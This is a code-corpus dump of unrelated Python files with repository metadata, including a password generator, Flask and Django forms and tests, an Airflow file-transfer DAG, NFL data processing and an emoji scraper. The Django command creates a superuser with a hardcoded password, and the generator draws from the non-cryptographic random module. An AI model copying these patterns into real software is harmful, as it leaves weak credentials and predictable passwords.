| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 1
|
b93a3daf85b033d7039d8c3747eadb457802db6b
| 2,814
|
py
|
Python
|
GeneratePassword/generate_password_v2.py
|
OneScreenfulOfPython/screenfuls
|
ea4e378c8d9e530edadd4a3315fe9e8acc98460b
|
[
"Apache-2.0"
] | 2
|
2015-01-19T14:50:55.000Z
|
2015-01-28T12:45:59.000Z
|
GeneratePassword/generate_password_v2.py
|
OneScreenfulOfPython/screenfuls
|
ea4e378c8d9e530edadd4a3315fe9e8acc98460b
|
[
"Apache-2.0"
] | null | null | null |
GeneratePassword/generate_password_v2.py
|
OneScreenfulOfPython/screenfuls
|
ea4e378c8d9e530edadd4a3315fe9e8acc98460b
|
[
"Apache-2.0"
] | null | null | null |
import os, sys
import random
import string
try:
# Make Python2 work like Python3
input = raw_input
except NameError:
# On Python3; already using input
pass
letters = string.ascii_letters
numbers = string.digits
punctuation = string.punctuation
def generate(password_length, at_least_one_letter, at_least_one_number, at_least_one_punctuation):
"""Generate a password by include enough random
characters to meet the password length restriction.
In addition, the user can specify that at least one
of the each of the classes of character be used.
"""
#
# Any combination of characters is valid
#
valid_characters = ""
if at_least_one_letter:
valid_characters += letters
if at_least_one_number:
valid_characters += numbers
if at_least_one_punctuation:
valid_characters += punctuation
#
# Start with a blank password and then go round enough
# times to make a password of the required length.
#
password = ""
for i in range(password_length):
#
# Each time around, ensure that one of each of the selected
# groups is chosen, and then just choose randomly from all
# groups.
#
if at_least_one_letter:
character = random.choice(letters)
at_least_one_letter = False
elif at_least_one_number:
character = random.choice(numbers)
at_least_one_number = False
elif at_least_one_punctuation:
character = random.choice(punctuation)
at_least_one_punctuation = False
else:
character = random.choice(valid_characters)
password += character
#
# Finally, shuffle the password so we don't always get a
# letter at the beginning, with a number after and some
# punctuation.
#
characters = list(password)
#
# random.shuffle shuffles a list *in place*
#
random.shuffle(characters)
#
# X.join(...) means: return all the strings in (...) joined by X
# ", ".join(['Eggs', 'Bacon', 'Beans']) => "Eggs, Bacon, Beans"
# But if you want to generate *real* .csv files, use the csv module
# because there are lots of corner-cases.
#
password = "".join(characters)
return password
if __name__ == '__main__':
password_length = int(input("How many letters? "))
at_least_one_letter = "Y" == (input("At least one letter [Y/n]? ").upper() or "Y")
at_least_one_number = "Y" == (input("At least one number [Y/n]? ").upper() or "Y")
at_least_one_punctuation = "Y" == (input("At least one punctuation [Y/n]? ").upper() or "Y")
password = generate(password_length, at_least_one_letter, at_least_one_number, at_least_one_punctuation)
print("Your password is: {}".format(password))
| 33.5
| 108
| 0.658138
| 369
| 2,814
| 4.821138
| 0.365854
| 0.086565
| 0.123665
| 0.062957
| 0.229342
| 0.106802
| 0.106802
| 0.106802
| 0.084317
| 0.084317
| 0
| 0.001428
| 0.253376
| 2,814
| 83
| 109
| 33.903614
| 0.845312
| 0.327292
| 0
| 0.046512
| 0
| 0
| 0.074878
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.023256
| false
| 0.255814
| 0.069767
| 0
| 0.116279
| 0.023256
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 1
|
b93b21d31a5eecb527d2b3ad7f00cf5d4683d661
| 1,535
|
py
|
Python
|
forms.py
|
lennykioko/Flask-social-network
|
15bfe1f7dca90074c0cbef62c5da9d5a25b5ce65
|
[
"MIT"
] | 1
|
2018-04-15T19:35:54.000Z
|
2018-04-15T19:35:54.000Z
|
forms.py
|
lennykioko/Flask-social-network
|
15bfe1f7dca90074c0cbef62c5da9d5a25b5ce65
|
[
"MIT"
] | null | null | null |
forms.py
|
lennykioko/Flask-social-network
|
15bfe1f7dca90074c0cbef62c5da9d5a25b5ce65
|
[
"MIT"
] | null | null | null |
# forms are not just about display, instead they are more of validation
# wtf forms protect our site against csrf attacks
from flask_wtf import FlaskForm
from wtforms import StringField, PasswordField, TextAreaField
from wtforms.validators import (DataRequired, Regexp, ValidationError, Email,
Length, EqualTo)
from models import User
def name_exists(form, field):
if User.select().where(User.username == field.data).exists():
raise ValidationError('User with this name already exists.')
def email_exists(form, field):
if User.select().where(User.email == field.data).exists():
raise ValidationError('User with this email already exists.')
class RegisterForm(FlaskForm):
username = StringField(
'Username', # is the label
validators=[
DataRequired(),
Regexp(
r'^[a-zA-Z0-9_]+$',
message = ("Username should be one word, letters, numbers and underscores only.")
),
name_exists
])
email = StringField(
'Email',
validators=[
DataRequired(),
Email(),
email_exists
])
password = PasswordField(
'Password',
validators=[
DataRequired(),
Length(min=8),
EqualTo('password2', message = 'Passwords must match')
])
password2 = PasswordField(
'Confirm Password',
validators=[DataRequired()
])
class LoginForm(FlaskForm):
email = StringField('Email', validators=[DataRequired(), Email()])
password = PasswordField('Password', validators=[DataRequired()])
class PostForm(FlaskForm):
content = TextAreaField("What's Up?", validators = [DataRequired()])
| 25.583333
| 85
| 0.712704
| 171
| 1,535
| 6.362573
| 0.48538
| 0.141544
| 0.082721
| 0.03125
| 0.334559
| 0.240809
| 0.152574
| 0.152574
| 0
| 0
| 0
| 0.003891
| 0.162866
| 1,535
| 59
| 86
| 26.016949
| 0.842802
| 0.084691
| 0
| 0.222222
| 0
| 0
| 0.172734
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.044444
| false
| 0.155556
| 0.088889
| 0
| 0.355556
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 1
|
b9421dbb7e263a5a3de9a9e29e270b09ceba630c
| 1,004
|
py
|
Python
|
django_events/users/management/commands/create_default_su.py
|
chrisBrookes93/django-events-management
|
93886448a7bb85c8758324977ff67bcacc80bbec
|
[
"MIT"
] | null | null | null |
django_events/users/management/commands/create_default_su.py
|
chrisBrookes93/django-events-management
|
93886448a7bb85c8758324977ff67bcacc80bbec
|
[
"MIT"
] | null | null | null |
django_events/users/management/commands/create_default_su.py
|
chrisBrookes93/django-events-management
|
93886448a7bb85c8758324977ff67bcacc80bbec
|
[
"MIT"
] | null | null | null |
from django.core.management.base import BaseCommand
from django.contrib.auth import get_user_model
class Command(BaseCommand):
help = "Creates a default super user if one doesn't already exist. " \
"This is designed to be used in the docker-compose.yml to create an initial super user on deployment."
def handle(self, *args, **kwargs):
"""
Checks whether any super users exist and creates a default one if not
:param args: Unused
:param kwargs: Unused
"""
super_users = get_user_model().objects.filter(is_superuser=True)
if super_users.exists():
self.stdout.write('A superuser already exists, not creating one')
else:
get_user_model().objects.create_superuser(email="admin@events.com", password="EventsEvents")
self.stdout.write('Created default superuser "admin@events.com"')
self.stdout.write('Make sure you change the password immediately!')
| 41.833333
| 114
| 0.661355
| 129
| 1,004
| 5.069767
| 0.581395
| 0.03211
| 0.055046
| 0.058104
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.25
| 1,004
| 23
| 115
| 43.652174
| 0.868526
| 0.111554
| 0
| 0
| 0
| 0.076923
| 0.387214
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.076923
| false
| 0.153846
| 0.153846
| 0
| 0.384615
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 1
|
b9458ab72f55b4db845f6d76e44dba3b00e000ed
| 6,265
|
py
|
Python
|
src/features/v3/proc_v3_n1_calc_distance.py
|
askoki/nfl_dpi_prediction
|
dc3256f24ddc0b6725eace2081d1fb1a7e5ce805
|
[
"MIT"
] | null | null | null |
src/features/v3/proc_v3_n1_calc_distance.py
|
askoki/nfl_dpi_prediction
|
dc3256f24ddc0b6725eace2081d1fb1a7e5ce805
|
[
"MIT"
] | null | null | null |
src/features/v3/proc_v3_n1_calc_distance.py
|
askoki/nfl_dpi_prediction
|
dc3256f24ddc0b6725eace2081d1fb1a7e5ce805
|
[
"MIT"
] | null | null | null |
import os
import sys
import pandas as pd
from datetime import datetime
from settings import RAW_DATA_DIR, DataV3, DATA_V3_SUBVERSION
from src.features.helpers.processing import add_missing_timestamp_values
from src.features.helpers.processing_v3 import get_closest_players, get_players_and_ball_indices, calculate_distance, \
normalize_according_to_play_direction, check_group_event
from src.features.helpers.processing_v4 import home_has_possession, calculate_team_sitation
week_num = int(sys.argv[1])
data_v3 = DataV3(DATA_V3_SUBVERSION)
save_file_path = data_v3.get_step1_checkpoint_path(week_num)
try:
clean_df = pd.read_csv(save_file_path)
save_file_exists = True
except FileNotFoundError:
save_file_exists = False
if not save_file_exists:
print("Started loading data")
play_df = pd.read_csv(os.path.join(RAW_DATA_DIR, 'plays.csv'))
games_df = pd.read_csv(os.path.join(RAW_DATA_DIR, 'games.csv'))
week_and_games = games_df[games_df.week == week_num]
tracking_df = pd.read_csv(os.path.join(RAW_DATA_DIR, f'week{week_num}.csv'))
print("Data loaded. Start processing timestamps")
tracking_df = add_missing_timestamp_values(tracking_df)
games_n_plays_df = play_df.merge(week_and_games, how='inner', on='gameId')
m_grouped = games_n_plays_df.groupby(['gameId', 'playId'])
df_t = tracking_df.merge(games_n_plays_df, how='left', on=['gameId', 'playId'])
# Remove all events without 'pass_forward'
df_t_grouped = df_t.groupby(['gameId', 'playId'])
df_t_v3 = df_t.copy().sort_index()
for name, group in df_t_grouped:
game_id, play_id = name
# if group does not contain pass forward, drop it
if all(group.event != 'pass_forward'):
df_t_v3 = df_t_v3[(df_t_v3.gameId != game_id) | (df_t_v3.playId != play_id)]
df_t_v3_s = df_t_v3.sort_values(by=['gameId', 'playId', 'time', 'event'])
df_t_v3_s = df_t_v3_s.reset_index(drop=True)
df_t_grouped = df_t_v3_s.groupby(['gameId', 'playId'])
# remove all values before 'pass_forward'
print("Removing all values before pass forward event...")
for name, group in df_t_grouped:
game_id, play_id = name
pass_forward_frame_id = group[group.event == 'pass_forward'].index.min() - 1
remove_start = group.index.min()
df_t_v3_s = df_t_v3_s.drop(df_t_v3_s.loc[remove_start:pass_forward_frame_id].index)
pd.options.mode.chained_assignment = None
gb = df_t_v3_s.groupby(['gameId', 'playId'])
print('Getting closest players...')
keep_indices = []
for name, group in gb:
game_id, play_id = name
try:
event_3rd = group.event.unique()[2]
except IndexError:
print('Number of events is < 3, skipping...')
continue
situation_df = group[group.event == event_3rd]
# convert dataframe into series
ball_row = situation_df[situation_df.team == 'football'].head(1)
# remove ball
player_situation_df = situation_df[situation_df.team != 'football']
try:
p1, p2 = get_closest_players(player_situation_df, ball_row.x.item(), ball_row.y.item())
except ValueError:
print('Value Error raised. This group will be skipped.')
continue
p_n_b_indices = get_players_and_ball_indices(group, p1, p2)
if p_n_b_indices:
keep_indices.extend(p_n_b_indices)
clean_df = df_t_v3_s[df_t_v3_s.index.isin(keep_indices)]
clean_df.to_csv(
save_file_path,
index=False
)
print('Normalize...')
clean_df = normalize_according_to_play_direction(clean_df)
clean_df['homeHasPossession'] = clean_df.apply(
lambda row: home_has_possession(row), axis=1
)
clean_df['teamSituation'] = clean_df.apply(
lambda row: calculate_team_sitation(row), axis=1
)
print('Creating features...')
min_df = clean_df[[
'time', 'x', 'y', 's', 'o', 'dir', 'event', 'team',
'gameId', 'playId', 'frameId', 'isDefensivePI'
]]
gb_2 = clean_df.groupby(['gameId', 'playId', 'frameId'])
# ball direction and orientation are NaN
calc_df = pd.DataFrame(
columns=[
'time',
'att_def_d', 'att_ball_d', 'def_ball_d',
'att_s', 'def_s', 'ball_s',
'att_o', 'def_o',
'att_dir', 'def_dir',
'event', 'gameId', 'playId', 'frameId', 'isDefensivePI'
]
)
GROUP_SIZE_MINIMUM = 3
for name, group in gb_2:
game_id, play_id, frameId = name
if len(group) < GROUP_SIZE_MINIMUM:
continue
ball = group[group.teamSituation == 'football'].head(1).squeeze()
p_att = group[group.teamSituation == 'attacking'].head(1).squeeze()
p_def = group[group.teamSituation == 'defending'].head(1).squeeze()
group_row = group.head(1).squeeze()
group_events = group.event.unique().tolist()
dict_to_append = {
'time': group_row.time,
'att_def_d': calculate_distance(p_att.x, p_att.y, p_def.x, p_def.y),
'att_ball_d': calculate_distance(p_att.x, p_att.y, ball.x, ball.y),
'def_ball_d': calculate_distance(p_def.x, p_def.y, ball.x, ball.y),
'att_s': p_att.s, 'def_s': p_def.s, 'ball_s': ball.s,
'att_a': p_att.a, 'def_a': p_def.a, 'ball_a': ball.a,
'att_o': p_att.o, 'def_o': p_def.o,
'att_dir': p_att.dir, 'def_dir': p_def.dir,
'event': group_row.event,
'pass_arrived': check_group_event(group_events, 'pass_arrived'),
'pass_outcome_caught': check_group_event(group_events, 'pass_outcome_caught'),
'tackle': check_group_event(group_events, 'tackle'),
'first_contact': check_group_event(group_events, 'first_contact'),
'pass_outcome_incomplete': check_group_event(group_events, 'pass_outcome_incomplete'),
'out_of_bounds': check_group_event(group_events, 'out_of_bounds'),
'week': week_num,
'gameId': group_row.gameId,
'playId': group_row.playId,
'frameId': group_row.frameId,
'isDefensivePI': group_row.isDefensivePI
}
calc_df = calc_df.append(
dict_to_append,
ignore_index=True
)
print("Saving data...")
calc_df.to_csv(
data_v3.get_step1_end_path(week_num),
index=False
)
print(f'End time: {datetime.now().strftime("%H:%M:%S")}')
| 35.596591
| 119
| 0.675499
| 934
| 6,265
| 4.17666
| 0.217345
| 0.017688
| 0.020508
| 0.015381
| 0.277108
| 0.136632
| 0.102538
| 0.067931
| 0.058703
| 0.044348
| 0
| 0.009312
| 0.194413
| 6,265
| 175
| 120
| 35.8
| 0.763622
| 0.03336
| 0
| 0.095588
| 0
| 0
| 0.168788
| 0.013721
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0.051471
| 0.058824
| 0
| 0.058824
| 0.073529
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 1
|
b967ba0197b144171458b230c2dfe31844ba0b72
| 5,231
|
py
|
Python
|
dags/download_decrypt_transfer_files.py
|
hms-dbmi/bch-pic-sure-airflow-dags
|
0c1e6f07da4e270581942e551ac30284474921d4
|
[
"Apache-2.0"
] | null | null | null |
dags/download_decrypt_transfer_files.py
|
hms-dbmi/bch-pic-sure-airflow-dags
|
0c1e6f07da4e270581942e551ac30284474921d4
|
[
"Apache-2.0"
] | null | null | null |
dags/download_decrypt_transfer_files.py
|
hms-dbmi/bch-pic-sure-airflow-dags
|
0c1e6f07da4e270581942e551ac30284474921d4
|
[
"Apache-2.0"
] | null | null | null |
"""
@author: anilkdegala
"""
import os
from airflow import DAG
from airflow.operators.bash_operator import BashOperator
from airflow.operators.python_operator import PythonOperator, BranchPythonOperator
from datetime import date, timedelta, datetime
from collections import OrderedDict
from scripts.dag_pebbles import DagPebbles
from airflow.configuration import conf
from scripts.configurations import *
from airflow.operators.dummy_operator import DummyOperator
default_args = {
"owner": "anilkdegala",
"depends_on_past": True,
"max_active_runs": 1,
"start_date": datetime(2015, 6, 1),
"is_active": True,
"is_paused_upon_creation": False,
}
def begin_pipeline(**kwargs):
print("begin_pipeline:")
files = kwargs['dag_run'].conf.get('files')
download_decrypt_arguments = ''
transfer_arguments_list = []
for f in files:
print("download_decrypt_transfer_files: file: ", f['name'], ', location: ', f['path'])
output = f['name']+','+f['path']+','+f['final_name']
download_decrypt_arguments = download_decrypt_arguments + " " + output
transfer_arguments_list.append(DATA_LOCATION + "/"+f['final_name'])
transfer_arguments = ",".join(transfer_arguments_list)
print("final download_decrypt_arguments: ",download_decrypt_arguments)
print("final transfer_arguments: ",transfer_arguments)
kwargs["ti"].xcom_push(key="download_decrypt_arguments", value=download_decrypt_arguments)
kwargs["ti"].xcom_push(key="transfer_arguments", value=transfer_arguments)
def pipeline_enable_check(**kwargs):
dp = DagPebbles()
if dp.pipeline_enable_check('DATA_LOAD'):
return "pipeline_check_passed"
else:
return "pipeline_check_skipped"
def pipeline_check_passed(**kwargs):
print("pipeline_check_passed:")
def end_pipeline(**kwargs):
print("end_pipeline:")
def pipeline_check_skipped(**kwargs):
print("pipeline_check_skipped:")
def cleanup(**kwargs):
dp = DagPebbles()
print("cleanup")
def notify(**kwargs):
dp = DagPebbles()
print("notify")
def end(**kwargs):
dp = DagPebbles()
print("end")
with DAG( "DOWNLOAD_DECRYPT_TRANSFER",
description="Download, Decrypt, Transfer files (Source: S3, Staging: EC2: Target: RDS Oracle)",
default_args=default_args,
schedule_interval=None,
catchup=False,
orientation="TB",
tags=['Utils'],
dagrun_timeout=timedelta(hours=240)
) as dag:
t_pipeline_begin = PythonOperator(
task_id="begin_pipeline",
python_callable=begin_pipeline,
provide_context=True,
dag=dag,
)
t_check_pipeline = BranchPythonOperator(
task_id="check_pipeline",
python_callable=pipeline_enable_check,
provide_context=True,
dag=dag,
)
t_pipeline_check_passed = PythonOperator(
task_id="pipeline_check_passed",
python_callable=pipeline_check_passed,
provide_context=True,
dag=dag,
)
t_pipeline_check_skipped = PythonOperator(
task_id="pipeline_check_skipped",
python_callable=pipeline_check_skipped,
provide_context=True,
dag=dag,
)
download_files_cmd = "/opt/bitnami/airflow/airflow-data/scripts/download_files.sh "+"{{ ti.xcom_pull(key='download_decrypt_arguments')}}"
t_download_files = BashOperator(
task_id='download_files',
bash_command=download_files_cmd,
dag=dag)
decrypt_files_cmd = "/opt/bitnami/airflow/airflow-data/scripts/decrypt_files.sh "+"{{ ti.xcom_pull(key='download_decrypt_arguments')}} "
t_decrypt_files = BashOperator(
task_id='decrypt_files',
bash_command=decrypt_files_cmd,
dag=dag)
transfer_files_cmd = "/opt/bitnami/airflow/airflow-data/scripts/transfer_files_rds.pl "+"{{ ti.xcom_pull(key='transfer_arguments')}} "
t_transfer_files = BashOperator(
task_id='transfer_files',
bash_command=transfer_files_cmd,
dag=dag)
t_end_pipeline = PythonOperator(
task_id="end_pipeline",
python_callable=end_pipeline,
provide_context=True,
trigger_rule="none_failed",
dag=dag,
)
t_notify = PythonOperator(
task_id="send_notifications",
python_callable=notify,
provide_context=True,
trigger_rule="none_failed",
dag=dag,
)
t_cleanup = PythonOperator(
task_id="cleanup",
python_callable=cleanup,
provide_context=True,
trigger_rule="none_failed",
dag=dag,
)
t_end = PythonOperator(
task_id="end",
python_callable=end,
provide_context=True,
trigger_rule="none_failed",
dag=dag,
)
t_pipeline_begin >> t_check_pipeline
t_check_pipeline >> t_pipeline_check_skipped >> t_end_pipeline
t_check_pipeline >> t_pipeline_check_passed >> t_download_files >> t_decrypt_files >> t_transfer_files >> t_end_pipeline
t_end_pipeline >> t_cleanup >> t_notify >> t_end
| 30.770588
| 171
| 0.664118
| 585
| 5,231
| 5.586325
| 0.218803
| 0.055692
| 0.066095
| 0.025704
| 0.250306
| 0.222766
| 0.168605
| 0.146573
| 0.083843
| 0.083843
| 0
| 0.002979
| 0.229975
| 5,231
| 169
| 172
| 30.952663
| 0.808342
| 0.003823
| 0
| 0.201493
| 0
| 0
| 0.208149
| 0.111474
| 0.022388
| 0
| 0
| 0
| 0
| 1
| 0.059701
| false
| 0.052239
| 0.074627
| 0
| 0.149254
| 0.074627
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 1
|
b96b280416f0d557826ffa670a7914f2d45e5fc5
| 526
|
py
|
Python
|
src/sot_talos_balance/test/test_feet_admittance.py
|
imaroger/sot-talos-balance
|
5e56700b4e105273ecf6feb3474789beac469a77
|
[
"BSD-2-Clause"
] | null | null | null |
src/sot_talos_balance/test/test_feet_admittance.py
|
imaroger/sot-talos-balance
|
5e56700b4e105273ecf6feb3474789beac469a77
|
[
"BSD-2-Clause"
] | null | null | null |
src/sot_talos_balance/test/test_feet_admittance.py
|
imaroger/sot-talos-balance
|
5e56700b4e105273ecf6feb3474789beac469a77
|
[
"BSD-2-Clause"
] | null | null | null |
'''Test feet admittance control'''
from sot_talos_balance.utils.run_test_utils import run_ft_calibration, run_test, runCommandClient
try:
# Python 2
input = raw_input # noqa
except NameError:
pass
run_test('appli_feet_admittance.py')
run_ft_calibration('robot.ftc')
input("Wait before running the test")
print('Set saturation value')
runCommandClient('robot.admBF_dqSaturation.sin.value = [0.0, 0.0, 0.01, 0.0, 0.0, 0.0]')
input("Wait before dumping the data")
runCommandClient('dump_tracer(robot.tracer)')
| 25.047619
| 97
| 0.752852
| 79
| 526
| 4.822785
| 0.556962
| 0.047244
| 0.055118
| 0.052493
| 0.028871
| 0
| 0
| 0
| 0
| 0
| 0
| 0.030369
| 0.123574
| 526
| 20
| 98
| 26.3
| 0.796095
| 0.081749
| 0
| 0
| 0
| 0.083333
| 0.42437
| 0.17437
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0.083333
| 0.083333
| 0
| 0.083333
| 0.083333
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 1
|
b96d766a7c5eab27eb3785b1277b6beccda7c9ed
| 1,446
|
py
|
Python
|
auth/tests/test_views.py
|
asb29/Redundant
|
ee816fd41f9217610bd11f757cf9175288723c70
|
[
"MIT"
] | null | null | null |
auth/tests/test_views.py
|
asb29/Redundant
|
ee816fd41f9217610bd11f757cf9175288723c70
|
[
"MIT"
] | null | null | null |
auth/tests/test_views.py
|
asb29/Redundant
|
ee816fd41f9217610bd11f757cf9175288723c70
|
[
"MIT"
] | null | null | null |
from django.test import TestCase
from django.test import Client
class RegisterTestCase(TestCase):
def test_register(self):
c = Client()
# on success redirects to /
response = c.post('/accounts/register/', {
'username': 'asdas',
'password1': 'asdasdasd12',
'password2': 'asdasdasd12'
})
self.assertRedirects(response, '/')
# passwords don't match
response = c.post('/accounts/register/', {
'username': 'asdasdasd1',
'password1': 'asdasdasd1',
'password2': 'asdasdasd2'
})
self.assertEquals(response.status_code, 200)
# username is empty
response = c.post('/accounts/register/', {
'username': '',
'password1': 'asdasdasd12',
'password2': 'asdasdasd12'
})
self.assertEquals(response.status_code, 200)
# no password
response = c.post('/accounts/register/', {
'username': 'asdasdasd',
'password1': '',
'password2': ''
})
self.assertEquals(response.status_code, 200)
# username and password are similar
response = c.post('/accounts/register/', {
'username': 'asdasdasd0',
'password1': 'asdasdasd1',
'password2': 'asdasdasd1'
})
self.assertEquals(response.status_code, 200)
| 30.125
| 52
| 0.53527
| 116
| 1,446
| 6.62931
| 0.37931
| 0.058518
| 0.084525
| 0.136541
| 0.563069
| 0.453836
| 0.117035
| 0
| 0
| 0
| 0
| 0.037344
| 0.333333
| 1,446
| 47
| 53
| 30.765957
| 0.760373
| 0.076763
| 0
| 0.571429
| 0
| 0
| 0.258841
| 0
| 0
| 0
| 0
| 0
| 0.142857
| 1
| 0.028571
| false
| 0.285714
| 0.057143
| 0
| 0.114286
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 1
|
b999aec7c34874ef90e0f30812ac97217ce90cca
| 3,145
|
py
|
Python
|
emoji.py
|
notagoat/Deepmoji
|
1ab922306c3647f9c7ea98caa2660a53b18fe4b6
|
[
"MIT"
] | 1
|
2020-03-19T20:09:00.000Z
|
2020-03-19T20:09:00.000Z
|
emoji.py
|
notagoat/Deepmoji
|
1ab922306c3647f9c7ea98caa2660a53b18fe4b6
|
[
"MIT"
] | null | null | null |
emoji.py
|
notagoat/Deepmoji
|
1ab922306c3647f9c7ea98caa2660a53b18fe4b6
|
[
"MIT"
] | null | null | null |
import requests
import urllib.request
import os.path
import shutil
import csv
def main():
with open("data.csv") as i: #Open the data.csv file
instances = i.readlines() #Write them into memory
instances = [x.strip() for x in instances] #Strip any weird issues from writing
instances.sort() #Sort them alphabetically
setup(instances) #Run setup to create all the necessary files and subfolders
count = len(instances) #Get the count just for fun
i = 0
try:
for name in instances:
try:
i += 1
print("-----!"+name+"!-----")
print(str(i) +" of " + str(count) + " remaining!")
fetch(name) #Run the fetching code
except Exception as e:
print(e) #Print the error. We catch errors here for pleroma instances, weirdly encoded urls, etc
pass #Don't stop the beat
except Exception as e:
print("Instance Error")
print(e)
pass
clone(instances) #Clone all of them into one big folder for ease of access
def fetch(name):
r = requests.get('https://%s/api/v1/custom_emojis'% name, allow_redirects=True) #Throw the instance name into the standard url for fetching data
path = "emoji/%s/" % name #Because of the clone function we know all of these folders will exist
try:
for emoji in r.json(): #Emoji = the json code from the request
try:
if os.path.isfile(path+emoji['shortcode']+".png"): #Check to see if it exists.
pass
else:
if "ms_" not in emoji['shortcode']: #Cut out Mutant Standard Emojis (Or at least most of them). #Mutant standard is huge and common
#print(emoji['shortcode'] + " found!")
emojiimage = requests.get(emoji['static_url'],allow_redirects=True) #Get the image from the json
open(path + emoji['shortcode']+".png",'wb').write(emojiimage.content) #Now save it as an image in the filesystem
except Exception as e:
print("Did not get: " + emoji['url']) #If somethings fucky throw a nice error then keep going.
print(e)
pass
except Exception as e:
print(e)
def setup(instances):
if (os.path.isdir("emoji/")): #Check to see if emoji/ exists
pass
else:
os.mkdir("emoji/") #make it if it doesnt
for name in instances:
if (os.path.isdir("emoji/%s/"%name)):
pass
else: os.mkdir("emoji/%s/"%name)
if (os.path.isdir("emoji/all")):
pass
else:
os.mkdir("emoji/all")
def clone(instances):
for name in instances:
print("Copying emoji for: %s"% name)
path = "emoji/%s/" % name
files = os.listdir(path)
for name in files: #This gets alll files
try:
shutil.copyfile(path+name,"emoji/all/"+name) #Then copies them into the all folder
except Exception as e:
print(e)
pass
if __name__ == '__main__':
main()
| 37.440476
| 151
| 0.574245
| 418
| 3,145
| 4.289474
| 0.373206
| 0.020078
| 0.047407
| 0.050195
| 0.139431
| 0.070273
| 0
| 0
| 0
| 0
| 0
| 0.001403
| 0.320191
| 3,145
| 83
| 152
| 37.891566
| 0.837231
| 0.294118
| 0
| 0.430556
| 0
| 0
| 0.114299
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.055556
| false
| 0.111111
| 0.069444
| 0
| 0.125
| 0.138889
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 1
|
b9a767c55418efb8b98d12205d59e512ca419081
| 1,860
|
py
|
Python
|
blobStore.py
|
odeke-em/resty
|
838934033e7eeca521e8c6d8cb2e99778beaa4b9
|
[
"Apache-2.0"
] | null | null | null |
blobStore.py
|
odeke-em/resty
|
838934033e7eeca521e8c6d8cb2e99778beaa4b9
|
[
"Apache-2.0"
] | null | null | null |
blobStore.py
|
odeke-em/resty
|
838934033e7eeca521e8c6d8cb2e99778beaa4b9
|
[
"Apache-2.0"
] | null | null | null |
#!/usr/bin/env python3
# Author: Emmanuel Odeke <odeke@ualberta.ca>
# This example steps you through using resty & restAssured to save pickled/serialized
# data as a blob and then later re-using it in after deserialization.
# Sample usage might be in collaborative computing ie publish results from an expensive
# computation on one machine so that other machines can load it as live data.
def testSerializer():
import Serializer
bs = Serializer.BinarySerializer()
js = Serializer.JSONSerializer()
data = dict((i, i) for i in range(10))
bserial = bs.serialize(data)
jserial = js.serialize(data)
bdserial = bs.deserialize(bserial)
jdserial = js.deserialize(jserial)
print('bdserial', bdserial)
ioS = bs.ioStream(bserial)
ioR = ioS.read()
print('ioS data from the stream', ioR)
def testCloudPassagePickledVersion():
from entrails.cloudPassage import CloudPassageHandler
cc = CloudPassageHandler()
data = dict((i, i*10) for i in range(9))
title = 'Dict of items 0-8999, keys i*10'
res = cc.push(data, title=title, asPickle=True)
pulledObj = cc.pull(metaData='pickle')
print('PulledObj', pulledObj, data)
assert(pulledObj == data)
rmTry = cc.removeTrace(data, asPickle=True)
print(rmTry)
def testCloudPassageJSONVersion():
from entrails.cloudPassage import CloudPassageHandler
cc = CloudPassageHandler()
data = dict((str(i), i*10) for i in range(9))
title = 'Dict of items 0-8999, keys i*10'
res = cc.push(data, title=title, asPickle=False)
pulledObj = cc.pull(metaData='json')
print('PulledObj', pulledObj, data)
assert(pulledObj == data)
